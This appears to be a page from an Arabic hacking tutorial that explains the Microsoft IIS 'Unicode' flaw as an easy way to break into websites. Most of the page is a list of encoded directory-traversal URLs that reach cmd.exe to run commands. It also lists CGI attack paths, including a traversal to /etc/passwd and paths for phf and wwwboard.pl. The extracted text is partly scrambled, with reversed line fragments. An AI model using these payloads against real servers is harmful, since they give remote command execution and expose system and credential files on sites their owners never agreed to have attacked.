‫ أنا سمعت عنها كثير نفسى اشوف كيف شكلها وأعرف ويش هى ؟؟؟‬UNICODE ‫ اوووووة‬-:7 ‫س‬

 ‫ مما تصساعد في أختتراق‬Microsoft ‫ في‬IIS ‫م‬.‫ هى عبارة عن ضعف في نظا‬UNICODE ‫ حبيبى‬-:‫جهـ‬
                        ‫الموقع بكل سهوله عموما الختتراق بهذه الطرق سهل جهدا‬

    -: UONICODE ‫مقارنة بالطرق السابقة التى تصم ذكرها من قبل وسوف أضع أمثله على ثغرات‬
                                            vti_bin/.._/

%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../wi
                           \:nnt/system32/cmd.exe?/c+dir+c
                                               Rpc/../

%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
                                                 \:+c

                samples/..%255c..%255c..%255c..%255c..%255c../
                     \:%255cwinnt/system32/cmd.exe?/c+dir+c

              adsamples/..%255c..%255c..%255c..%255c..%255c../
                     \:%255cwinnt/system32/cmd.exe?/c+dir+c

         \:scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c/
                             msadc/..%c0%af../..%c0%af../../

                   \:%c0%af../winnt/system32/cmd.exe?/c+dir+c
                  cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af../
                   \:%c0%af../winnt/system32/cmd.exe?/c+dir+c

                       UONICODE ‫حاولت قد المستطاع انى أشكل فى أنواع‬

                             ‫ هذه مثال عليها‬CGI ‫أما بالنسبة الى ثغرات الـ‬
                   cgi-bin/view-source?../../../../../../../etc/passwd/

                                           cgi-bin/phf/
                                    cgi-bin/wwwboard.pl/
                                    cgi-bin/AT-admin.cgi/

                                      cgi-bin/info2www/
                                     cgi-bin/environ.cgi/

                                                 243